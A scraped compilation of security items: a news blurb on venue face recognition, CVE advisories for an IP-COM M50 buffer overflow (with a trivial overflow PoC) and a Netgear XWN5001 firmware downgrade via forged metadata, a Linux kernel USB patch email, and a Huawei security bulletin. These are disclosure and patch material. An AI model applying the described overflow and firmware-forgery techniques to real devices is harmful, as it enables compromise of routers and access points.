All Kelly Conlon wanted to do was watch the Rockettes with her daughter’s Girl Scout troop. But thanks to a face recognition system run by Madison Square Garden Entertainment, Conlon was summarily kicked out of Radio City Music Hall because she was unknowingly banned from the venue. The issue, according to MSG Entertainment, is that Conlon is an attorney at a law firm that’s currently engaged in litigation against the company. (Conlon said she is not personally involved in that litigation.) “They knew my name before I told them. They knew the firm I was associated with before I told them. And they told me I was not allowed to be there,” Conlon told NBC New York. MSG Entertainment, meanwhile, defended the attorney's expulsion as necessary to avoid an “inherently adverse environment.” The episode adds to concerns over the use of face-recognition tech, which remains so underregulated that a corporation can use it to punish its enemies. Happy holidays!

Russians Hacked JFK Airport Taxi Dispatch in Line-Skipping Scheme

IP-COM M50 V15.11.0.33(10768) was discovered to contain a buffer overflow via the picName parameter in the formDelWewifiPic function.

\# ip-com-13 vendor:IP-COM product:M50 version:V15.11.0.33(10768) type:Buffer Overflow author:Yifeng Li, Wolin Zhuang; ## Vulnerability description We found an buffer overflow vulnerability in IP-COM Technology IP-COM’s M50 routers with firmware which was released recently, allows control the "picName" to attack it. ## Buffer Overflow vulnerability In formDelWewifiPic function, the parameter "picName" is directly sprintf to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow. !\[\](https://i.imgur.com/tq71QYs.png) ## PoC ### Buffer Overflow We set the value of “picName” as aaaaaaaaaaaaaaaaaaaaaaaaa…… and the router will cause buffer overflow.

CVE-2022-45721: ip-com-13 - HackMD

A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system.

From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>,
	stable@vger.kernel.org, Alan Stern <stern@rowland.harvard.edu>,
	Rondreis <linhaoguo86@gmail.com>
Subject: \[PATCH 5.4 053/108\] USB: core: Prevent nested device-reset calls
Date: Tue, 13 Sep 2022 16:06:24 +0200	\[thread overview\]
Message-ID: <20220913140355.910732567@linuxfoundation.org> (raw)
In-Reply-To: <20220913140353.549108748@linuxfoundation.org\>

From: Alan Stern <stern@rowland.harvard.edu>

commit 9c6d778800b921bde3bff3cff5003d1650f942d1 upstream.

Automatic kernel fuzzing revealed a recursive locking violation in
usb-storage:

============================================
WARNING: possible recursive locking detected
5.18.0 #3 Not tainted
--------------------------------------------
kworker/1:3/1205 is trying to acquire lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

but task is already holding lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

...

stack backtrace:
CPU: 1 PID: 1205 Comm: kworker/1:3 Not tainted 5.18.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
1.13.0-1ubuntu1.1 04/01/2014
Workqueue: usb\_hub\_wq hub\_event
Call Trace:
<TASK>
\_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
dump\_stack\_lvl+0xcd/0x134 lib/dump\_stack.c:106
print\_deadlock\_bug kernel/locking/lockdep.c:2988 \[inline\]
check\_deadlock kernel/locking/lockdep.c:3031 \[inline\]
validate\_chain kernel/locking/lockdep.c:3816 \[inline\]
\_\_lock\_acquire.cold+0x152/0x3ca kernel/locking/lockdep.c:5053
lock\_acquire kernel/locking/lockdep.c:5665 \[inline\]
lock\_acquire+0x1ab/0x520 kernel/locking/lockdep.c:5630
\_\_mutex\_lock\_common kernel/locking/mutex.c:603 \[inline\]
\_\_mutex\_lock+0x14f/0x1610 kernel/locking/mutex.c:747
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230
usb\_reset\_device+0x37d/0x9a0 drivers/usb/core/hub.c:6109
r871xu\_dev\_remove+0x21a/0x270 drivers/staging/rtl8712/usb\_intf.c:622
usb\_unbind\_interface+0x1bd/0x890 drivers/usb/core/driver.c:458
device\_remove drivers/base/dd.c:545 \[inline\]
device\_remove+0x11f/0x170 drivers/base/dd.c:537
\_\_device\_release\_driver drivers/base/dd.c:1222 \[inline\]
device\_release\_driver\_internal+0x1a7/0x2f0 drivers/base/dd.c:1248
usb\_driver\_release\_interface+0x102/0x180 drivers/usb/core/driver.c:627
usb\_forced\_unbind\_intf+0x4d/0xa0 drivers/usb/core/driver.c:1118
usb\_reset\_device+0x39b/0x9a0 drivers/usb/core/hub.c:6114

This turned out not to be an error in usb-storage but rather a nested
device reset attempt.  That is, as the rtl8712 driver was being
unbound from a composite device in preparation for an unrelated USB
reset (that driver does not have pre\_reset or post\_reset callbacks),
its ->remove routine called usb\_reset\_device() -- thus nesting one
reset call within another.

Performing a reset as part of disconnect processing is a questionable
practice at best.  However, the bug report points out that the USB
core does not have any protection against nested resets.  Adding a
reset\_in\_progress flag and testing it will prevent such errors in the
future.

Link: https://lore.kernel.org/all/CAB7eexKUpvX-JNiLzhXBDWgfg2T9e9\_0Tw4HQ6keN==voRbP0g@mail.gmail.com/
Cc: stable@vger.kernel.org
Reported-and-tested-by: Rondreis <linhaoguo86@gmail.com>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Link: https://lore.kernel.org/r/YwkflDxvg0KWqyZK@rowland.harvard.edu
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
---
 drivers/usb/core/hub.c |   10 ++++++++++
 include/linux/usb.h    |    2 ++
 2 files changed, 12 insertions(+)

--- a/drivers/usb/core/hub.c
+++ b/drivers/usb/core/hub.c
@@ -5923,6 +5923,11 @@ re\_enumerate\_no\_bos:
  \* the reset is over (using their post\_reset method).
  \*
  \* Return: The same as for usb\_reset\_and\_verify\_device().
+ \* However, if a reset is already in progress (for instance, if a
+ \* driver doesn't have pre\_ or post\_reset() callbacks, and while
+ \* being unbound or re-bound during the ongoing reset its disconnect()
+ \* or probe() routine tries to perform a second, nested reset), the
+ \* routine returns -EINPROGRESS.
  \*
  \* Note:
  \* The caller must own the device lock.  For example, it's safe to use
@@ -5956,6 +5961,10 @@ int usb\_reset\_device(struct usb\_device \*
 		return -EISDIR;
 	}
 
+	if (udev->reset\_in\_progress)
+		return -EINPROGRESS;
+	udev->reset\_in\_progress = 1;
+
 	port\_dev = hub->ports\[udev->portnum - 1\];
 
 	/\*
@@ -6020,6 +6029,7 @@ int usb\_reset\_device(struct usb\_device \*
 
 	usb\_autosuspend\_device(udev);
 	memalloc\_noio\_restore(noio\_flag);
+	udev->reset\_in\_progress = 0;
 	return ret;
 }
 EXPORT\_SYMBOL\_GPL(usb\_reset\_device);
--- a/include/linux/usb.h
+++ b/include/linux/usb.h
@@ -580,6 +580,7 @@ struct usb3\_lpm\_parameters {
  \* @devaddr: device address, XHCI: assigned by HW, others: same as devnum
  \* @can\_submit: URBs may be submitted
  \* @persist\_enabled:  USB\_PERSIST enabled for this device
+ \* @reset\_in\_progress: the device is being reset
  \* @have\_langid: whether string\_langid is valid
  \* @authorized: policy has said we can use it;
  \*	(user space) policy determines if we authorize this device to be
@@ -665,6 +666,7 @@ struct usb\_device {
 
 	unsigned can\_submit:1;
 	unsigned persist\_enabled:1;
+	unsigned reset\_in\_progress:1;
 	unsigned have\_langid:1;
 	unsigned authorized:1;
 	unsigned authenticated:1;

next prev parent reply	other threads:\[~2022-09-13 15:01 UTC|newest\]

**Thread overview:** 114+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
2022-09-13 14:05 \[PATCH 5.4 000/108\] 5.4.212-rc1 review Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 001/108\] efi: capsule-loader: Fix use-after-free in efi\_capsule\_write Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 002/108\] wifi: iwlegacy: 4965: corrected fix for potential off-by-one overflow in il4965\_rs\_fill\_link\_cmd() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 003/108\] net: mvpp2: debugfs: fix memory leak when using debugfs\_lookup() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 004/108\] fs: only do a memory barrier for the first set\_buffer\_uptodate() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 005/108\] Revert "mm: kmemleak: take a full lowmem check in kmemleak\_\*\_phys()" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 006/108\] net: dp83822: disable false carrier interrupt Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 007/108\] drm/msm/dsi: fix the inconsistent indenting Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 008/108\] drm/msm/dsi: Fix number of regulators for msm8996\_dsi\_cfg Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 009/108\] platform/x86: pmc\_atom: Fix SLP\_TYPx bitfield mask Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 010/108\] iio: adc: mcp3911: make use of the sign bit Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 011/108\] ieee802154/adf7242: defer destroy\_workqueue call Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 012/108\] wifi: cfg80211: debugfs: fix return type in ht40allow\_map\_read() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 013/108\] Revert "xhci: turn off port power in shutdown" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 014/108\] net: sched: tbf: dont call qdisc\_put() while holding tree lock Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 015/108\] ethernet: rocker: fix sleep in atomic context bug in neigh\_timer\_handler Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 016/108\] kcm: fix strp\_init() order and cleanup Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 017/108\] sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 018/108\] tcp: annotate data-race around challenge\_timestamp Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 019/108\] Revert "sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 020/108\] net/smc: Remove redundant refcount increase Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 021/108\] serial: fsl\_lpuart: RS485 RTS polariy is inverse Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 022/108\] staging: rtl8712: fix use after free bugs Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 023/108\] powerpc: align syscall table for ppc32 Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 024/108\] vt: Clear selection before changing the font Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 025/108\] tty: serial: lpuart: disable flow control while waiting for the transmit engine to complete Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 026/108\] Input: iforce - wake up after clearing IFORCE\_XMIT\_RUNNING flag Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 027/108\] iio: adc: mcp3911: use correct formula for AD conversion Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 028/108\] misc: fastrpc: fix memory corruption on probe Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 029/108\] misc: fastrpc: fix memory corruption on open Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 030/108\] USB: serial: ftdi\_sio: add Omron CS1W-CIF31 device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 031/108\] binder: fix UAF of ref->proc caused by race condition Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 032/108\] usb: dwc3: qcom: fix use-after-free on runtime-PM wakeup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 033/108\] drm/i915/reg: Fix spelling mistake "Unsupport" -> "Unsupported" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 034/108\] clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 035/108\] Revert "clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 036/108\] clk: core: Fix runtime PM sequence in clk\_core\_unprepare() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 037/108\] Input: rk805-pwrkey - fix module autoloading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 038/108\] clk: bcm: rpi: Fix error handling of raspberrypi\_fw\_get\_rate Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 039/108\] hwmon: (gpio-fan) Fix array out of bounds access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 040/108\] gpio: pca953x: Add mutex\_lock for regcache sync in PM Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 041/108\] thunderbolt: Use the actual buffer in tb\_async\_error() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 042/108\] xhci: Add grace period after xHC start to prevent premature runtime suspend Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 043/108\] USB: serial: cp210x: add Decagon UCA device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 044/108\] USB: serial: option: add support for OPPO R11 diag port Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 045/108\] USB: serial: option: add Quectel EM060K modem Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 046/108\] USB: serial: option: add support for Cinterion MV32-WA/WB RmNet mode Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 047/108\] usb: typec: altmodes/displayport: correct pin assignment for UFP receptacles Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 048/108\] usb: dwc2: fix wrong order of phy\_power\_on and phy\_init Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 049/108\] USB: cdc-acm: Add Icom PMR F3400 support (0c26:0020) Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 050/108\] usb-storage: Add ignore-residue quirk for NXP PN7462AU Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 051/108\] s390/hugetlb: fix prepare\_hugepage\_range() check for 2 GB hugepages Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 052/108\] s390: fix nospec table alignments Greg Kroah-Hartman
**2022-09-13 14:06 \` Greg Kroah-Hartman \[this message\]**
2022-09-13 14:06 \` \[PATCH 5.4 054/108\] usb: gadget: mass\_storage: Fix cdrom data transfers on MAC-OS Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 055/108\] driver core: Dont probe devices after bus\_type.match() probe deferral Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 056/108\] wifi: mac80211: Dont finalize CSA in IBSS mode if state is disconnected Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 057/108\] ip: fix triggering of icmp redirect Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 058/108\] net: mac802154: Fix a condition in the receive path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 059/108\] ALSA: seq: oss: Fix data-race for max\_midi\_devs access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 060/108\] ALSA: seq: Fix data-race at module auto-loading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 061/108\] drm/i915/glk: ECS Liva Q2 needs GLK HDMI port timing quirk Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 062/108\] btrfs: harden identification of a stale device Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 063/108\] usb: dwc3: fix PHY disable sequence Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 064/108\] usb: dwc3: disable USB core PHY management Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 065/108\] USB: serial: ch341: fix lost character on LCR updates Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 066/108\] USB: serial: ch341: fix disabled rx timer on older devices Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 067/108\] scsi: megaraid\_sas: Fix double kfree() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 068/108\] drm/gem: Fix GEM handle release errors Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 069/108\] drm/amdgpu: Check num\_gfx\_rings for gfx v9\_0 rb setup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 070/108\] drm/radeon: add a force flush to delay work when radeon Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 071/108\] parisc: ccio-dma: Handle kmalloc failure in ccio\_init\_resources() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 072/108\] parisc: Add runtime check to prevent PA2.0 kernels on PA1.x machines Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 073/108\] arm64: cacheinfo: Fix incorrect assignment of signed error value to unsigned fw\_level Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 074/108\] arm64/signal: Raise limit on stack frames Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 075/108\] fbdev: chipsfb: Add missing pci\_disable\_device() in chipsfb\_pci\_init() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 076/108\] drm/amdgpu: mmVM\_L2\_CNTL3 register not initialized correctly Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 077/108\] ALSA: emu10k1: Fix out of bounds access in snd\_emu10k1\_pcm\_channel\_alloc() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 078/108\] ALSA: aloop: Fix random zeros in capture data when using jiffies timer Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 079/108\] ALSA: usb-audio: Fix an out-of-bounds bug in \_\_snd\_usb\_parse\_audio\_interface() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 080/108\] kprobes: Prohibit probes in gate area Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 081/108\] debugfs: add debugfs\_lookup\_and\_remove() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 082/108\] nvmet: fix a use-after-free Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 083/108\] scsi: mpt3sas: Fix use-after-free warning Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 084/108\] scsi: lpfc: Add missing destroy\_workqueue() in error path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 085/108\] cgroup: Optimize single thread migration Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 086/108\] cgroup: Elide write-locking threadgroup\_rwsem when updating csses on an empty subtree Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 087/108\] cgroup: Fix threadgroup\_rwsem <-> cpus\_read\_lock() deadlock Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 088/108\] smb3: missing inode locks in punch hole Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 089/108\] ARM: dts: imx6qdl-kontron-samx6i: remove duplicated node Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 090/108\] regulator: core: Clean up on enable failure Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 091/108\] RDMA/cma: Fix arguments order in net device validation Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 092/108\] soc: brcmstb: pm-arm: Fix refcount leak and \_\_iomem leak bugs Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 093/108\] RDMA/hns: Fix supported page size Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 094/108\] netfilter: br\_netfilter: Drop dst references before setting Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 095/108\] netfilter: nf\_conntrack\_irc: Fix forged IP logic Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 096/108\] rxrpc: Fix an insufficiently large sglist in rxkad\_verify\_packet\_2() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 097/108\] afs: Use the operation issue time instead of the reply time for callbacks Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 098/108\] sch\_sfb: Dont assume the skb is still around after enqueueing to child Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 099/108\] tipc: fix shift wrapping bug in map\_get() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 100/108\] i40e: Fix kernel crash during module removal Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 101/108\] RDMA/siw: Pass a pointer to virt\_to\_page() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 102/108\] ipv6: sr: fix out-of-bounds read when setting HMAC data Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 103/108\] RDMA/mlx5: Set local port to one when accessing counters Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 104/108\] nvme-tcp: fix UAF when detecting digest errors Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 105/108\] tcp: fix early ETIMEDOUT after spurious non-SACK RTO Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 106/108\] sch\_sfb: Also store skb len before calling child enqueue Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 107/108\] x86/nospec: Fix i386 RSB stuffing Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 108/108\] MIPS: loongson32: ls1c: Fix hang during startup Greg Kroah-Hartman
2022-09-14  9:37 \` \[PATCH 5.4 000/108\] 5.4.212-rc1 review Sudip Mukherjee
2022-09-14 11:43 \` Naresh Kamboju
2022-09-14 20:19 \` Florian Fainelli
2022-09-15  0:14 \` Guenter Roeck
2022-09-17  3:06 \` zhouzhixiu

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=20220913140355.910732567@linuxfoundation.org \\
    --to=gregkh@linuxfoundation.org \\
    --cc=linhaoguo86@gmail.com \\
    --cc=linux-kernel@vger.kernel.org \\
    --cc=stable@vger.kernel.org \\
    --cc=stern@rowland.harvard.edu \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

CVE-2022-4662: [PATCH 5.4 053/108] USB: core: Prevent nested device-reset calls

The backup module has a path traversal vulnerability. Successful exploitation of this vulnerability causes unauthorized access to other system files.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the November 2022 Android security bulletin:

Critical: none

High: CVE-2022-20414, CVE-2022-20441, CVE-2022-20445, CVE-2022-20446, CVE-2022-20448, CVE-2022-20450, CVE-2022-20451, CVE-2022-20453, CVE-2022-20454, CVE-2022-20462, CVE-2022-20463, CVE-2022-20465, CVE-2022-2209, CVE-2022-25724, CVE-2022-25743, CVE-2021-1050, CVE-2022-25741

Medium: CVE-2022-20280, CVE-2022-20338

Low: none

Already included in previous updates: CVE-2022-25748, CVE-2022-20394, CVE-2021-39673, CVE-2022-20410, CVE-2022-20351, CVE-2022-26472, CVE-2022-22078

※ For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2022-41591: Path traversal vulnerability in the backup module

Severity: High

Affected versions: EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will cause unauthorized access to other system files.

CVE-2022-41596: Vulnerability of serialization/deserialization mismatch in system tools

Severity: High

Affected versions: EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will cause unauthorized startup of components.

CVE-2022-41599: Return value vulnerability in system services

Severity: Medium

Affected versions: EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2022-46312: Unstrict permission verification vulnerability in the app management module

Severity: Medium

Affected versions: EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will cause abnormal clearance of apps on the device.

CVE-2022-46317: Out-of-bounds read vulnerability in the power consumption module

Severity: Medium

Affected versions: EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-46318: Vulnerability of functional logic errors in the HAware module

Severity: Medium

Affected versions: EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will affect the account removal function in Settings.

CVE-2022-46319: Vulnerability of no boundary determination during fingerprint calibration

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause out-of-bounds write.

CVE-2022-46320: Out-of-bounds read vulnerability in the kernel module

Severity: Medium

Affected versions: EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause memory overwritting.

CVE-2022-46321: Permission verification vulnerability in the Wi-Fi module

Severity: Medium

Affected versions: EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2022-46322: Out-of-bounds memory write in some mobile phones

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause system services to be abnormal.

Acknowledgment: Wen Guanxing

CVE-2022-46323: Out-of-bounds memory write in some mobile phones

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause system services to be abnormal.

Acknowledgment: Wen Guanxing

CVE-2022-46324: Out-of-bounds memory write in some mobile phones

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause system services to be abnormal.

Acknowledgment: Wen Guanxing

CVE-2022-46325: Out-of-bounds memory write in some mobile phones

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause system services to be abnormal.

Acknowledgment: Wen Guanxing

CVE-2022-46326: Out-of-bounds memory write in some mobile phones

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause system services to be abnormal.

Acknowledgment: Wen Guanxing

CVE-2022-46327: Vulnerability of configuration issues in some mobile phones

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may lead to unauthorized operations, causing system services to be abnormal.

CVE-2022-46328: Input verification vulnerabilities in some mobile phones

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2022-41591: December

An exploitable firmware modification vulnerability was discovered on the Netgear XWN5001 Powerline 500 WiFi Access Point. An attacker can conduct a MITM (Man-in-the-Middle) attack to modify the user-uploaded firmware image and bypass the CRC check, allowing attackers to execute arbitrary code or cause a Denial of Service (DoS). This affects v0.4.1.1 and earlier.

\# Two Vulnerabilities Regarding Firmware Updates in Netgear XWN5001 WiFi Access Point ## Affected Products We have tested on Netgear XWN5001 – Powerline 500 WiFi Access Point (firmware version: 0.4.1.1 and earlier). Also, we suspect it may also work on other models with similar firmware versions. ## Vulnerability #1 - Firmware Downgrade Attack ### Overview: An exploitable firmware downgrade vulnerability was discovered on the XWN5001 – Powerline 500 WiFi Access Point. A specially crafted firmware update file can allow an attacker to install firmware of an older version while the user thinks firmware of a newer version is being installed. An attacker can create a custom firmware update package with modified metadata in order to trigger this vulnerability. ### Details: When performing a firmware update, users can download a new firmware image from the vendor server and upload it via the web interface of the device. The web interface uses HTTP protocol, which does not provide any cryptographic protection of the uploaded contents. Therefore, the firmware update process is vulnerable to man-in-the-middle (MITM) attacks. For the firmware image, the first 128 bytes of the firmware image contain firmware metadata, including device model, firmware version, region, etc. It is worth noting that, when a new firmware image is uploaded, the device checks the version of the uploaded firmware by reading the metadata and checks the file integrity by summing all bytes of the file. Specifically, if the new version number is larger than the current version number and the sum of all bytes of the new firmware image equals -1, the version check and file integrity check can be passed. An attacker could prepare a malicious firmware image by extracting an old firmware image. Once extracted, the attacker could modify the version number to meet two requirements: 1) the version number is larger than the current version number; 2) the sum of the version number is equal to the original version number of the unmodified firmware image. For example, the current firmware version is v.0.4.1.1, an attacker can download a firmware image of version v.0.4.0.7 and modify the version number to v.0.4.1.6, thus meeting the above two requirements (see Fig. 1 for firmware header without modification and Fig. 2. for firmware header after modification). In this case, when performing the firmware update the user will think that they are installing a newer version of firmware when in reality version v.0.4.0.7 firmware is installed on the device. Note that the communication uses the plain HTTP protocol, which does not provide any cryptographic protection of the uploaded contents. An attacker with a privileged network position (which could be obtained via ARP spoofing, DNS spoofing, or other approaches) can exploit this issue in order to provide arbitrary malicious firmware updates. This could allow more vulnerabilities in old versions of firmware to be introduced. 